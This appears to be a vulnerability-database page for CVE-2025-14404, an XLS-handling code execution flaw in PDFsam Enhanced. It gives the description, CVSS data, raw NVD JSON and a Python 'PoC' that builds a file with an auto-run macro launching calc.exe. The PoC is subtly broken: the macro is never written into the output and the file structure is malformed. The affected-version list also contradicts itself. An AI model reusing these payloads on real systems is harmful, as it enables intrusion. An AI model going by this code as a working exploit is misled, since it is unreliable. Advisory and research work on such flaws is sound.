Security Vulnerability Report
中文
CVE-2025-14404 CVSS 7.0 HIGH

CVE-2025-14404

Published: 2025-12-23 22:15:47
Last Modified: 2026-01-15 17:20:42
Source: [email protected]

Description

PDFsam Enhanced XLS File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of XLS files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27498.

CVSS Details

CVSS Score
7.0
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:pdfsam:enhanced:7.0.76.15222:*:*:*:*:*:*:* - VULNERABLE
PDFsam Enhanced < 5.2.4
PDFsam Enhanced < 5.1.6
PDFsam Enhanced < 4.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-14404 PoC - PDFsam Enhanced XLS File Remote Code Execution # This PoC demonstrates the vulnerability in PDFsam Enhanced's XLS file handling import struct from olefile import olefile import os def create_malicious_xls(): """ Create a malicious XLS file that exploits CVE-2025-14404 The file contains embedded OLE objects with executable code """ # Excel BIFF8 format header biff_header = bytearray() biff_header += b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1' # OLE2 signature # Create minimal OLE structure ole = olefile.OleFileIO() # Add malicious macro stream macro_stream = b''' Sub Auto_Open() 'CVE-2025-14404 - Malicious macro Shell "cmd.exe /c calc.exe", vbHide End Sub ''' # XLS Workbook stream with embedded OLE workbook_stream = bytearray() workbook_stream += b'\x09\x04' # BOF record type workbook_stream += struct.pack('<H', 0x0600) # Version workbook_stream += struct.pack('<H', 0x0000) # Type (workbook) # Add BoundSheet record pointing to macro workbook_stream += b'\x85\x04' # BOUNDSHEET record type workbook_stream += struct.pack('<I', len(workbook_stream)) # Offset workbook_stream += b'\x00\x00' # Hidden state workbook_stream += b'\x00\x00' # Sheet type workbook_stream += b'MaliciousMacro\x00' # Sheet name # EOF record workbook_stream += b'\x0A\x00' # EOF record type workbook_stream += struct.pack('<H', 0x0000) # Reserved return workbook_stream def create_exploit_xlsx(): """ Alternative: Create malicious XLSX with embedded OLE file """ import zipfile xlsx_content = { '[Content_Types].xml': '''<?xml version="1.0" encoding="UTF-8"?> <Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"> <Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/> </Types>''', 'xl/vbaProject.bin': create_malicious_xls() } return xlsx_content def main(): print("[*] CVE-2025-14404 PoC Generator") print("[*] Target: PDFsam Enhanced") print("[*] Vulnerability: Insufficient UI Warning for XLS file processing") # Generate malicious XLS file malicious_xls = create_malicious_xls() output_file = 'CVE-2025-14404_exploit.xls' with open(output_file, 'wb') as f: f.write(malicious_xls) print(f"[+] Generated malicious XLS file: {output_file}") print("[+] When opened in PDFsam Enhanced, the embedded macro will execute without warning") print("[+] Note: This PoC demonstrates the vulnerability concept only") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14404", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:46.950", "lastModified": "2026-01-15T17:20:42.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PDFsam Enhanced XLS File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the processing of XLS files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27498."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-356"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfsam:enhanced:7.0.76.15222:*:*:*:*:*:*:*", "matchCriteriaId": "6BDD768D-D92D-4D1C-977A-3987C03EACD2"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1092/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.